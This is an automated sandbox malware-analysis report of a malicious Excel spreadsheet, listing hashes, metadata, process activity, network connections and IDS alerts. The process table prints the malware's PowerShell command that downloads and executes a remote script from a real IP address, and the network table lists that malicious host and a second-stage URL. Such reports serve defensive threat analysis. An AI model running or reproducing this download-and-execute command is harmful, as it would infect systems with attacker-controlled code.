File name: | f49e4598d673730dce33744ac0bd84955b6fafd1f2f5bd3c72cb80787861f8cf.xls |
Full analysis: | https://app.any.run/tasks/24769026-f329-4421-91df-35ee5d66b860 |
Verdict: | Malicious activity |
Analysis date: | June 17, 2019, 01:42:48 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info: | Microsoft Excel 2007+ |
MD5: | E6A259F13ED2344A5092BB6FF80810F0 |
SHA1: | 3838E6FF2299C55BFB20F55FA6C5D97937028FA7 |
SHA256: | F49E4598D673730DCE33744AC0BD84955B6FAFD1F2F5BD3C72CB80787861F8CF |
SSDEEP: | 1536:VJiGbCVB1fvZB4sMgZh3CzPhatcCHO6T6Z/fhg:V0GGlpq4yr05O6efhg |
.xlam | | | Excel Macro-enabled Open XML add-in (42.4) |
---|---|---|
.xlsm | | | Excel Microsoft Office Open XML Format document (with Macro) (29.2) |
.xlsx | | | Excel Microsoft Office Open XML Format document (17.3) |
.zip | | | Open Packaging Conventions container (8.9) |
.zip | | | ZIP compressed archive (2) |
Creator: | John Skewes |
---|
ModifyDate: | 2019:06:11 05:15:29Z |
---|---|
CreateDate: | 2006:11:14 05:04:29Z |
LastModifiedBy: | Jack |
AppVersion: | 15.03 |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
Company: | PCYC archery |
TitlesOfParts: | Prompt |
HeadingPairs: |
|
ScaleCrop: | No |
DocSecurity: | None |
Application: | Microsoft Excel |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 2650 |
ZipCompressedSize: | 529 |
ZipCRC: | 0xafef54f5 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2960 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
1276 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX(New-Object Net.WebClient).DownloadString('http://178.159.7.9/Update.ps1'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2960 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE5CA.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1276 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5GG120AN8DUG83KYUNVV.temp | — | |
MD5:— | SHA256:— | |||
1276 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
1276 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1512c6.TMP | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1276 | powershell.exe | GET | 200 | 178.159.7.9:80 | http://178.159.7.9/Update.ps1 | GB | text | 2.79 Kb | malicious |
1276 | powershell.exe | GET | 200 | 178.159.7.9:9000 | http://178.159.7.9:9000/YMvFTAqR2D/VoQ3MHfq0x | GB | text | 7.29 Mb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1276 | powershell.exe | 178.159.7.9:9000 | — | UK Dedicated Servers Limited | GB | malicious |
1276 | powershell.exe | 178.159.7.9:80 | — | UK Dedicated Servers Limited | GB | malicious |
1276 | powershell.exe | 178.159.7.9:448 | — | UK Dedicated Servers Limited | GB | malicious |
PID | Process | Class | Message |
---|---|---|---|
1276 | powershell.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host PS1 Request |
1276 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] PowerShell.Script Request |
Process | Message |
---|---|
powershell.exe | Python failed to load the default activation context
|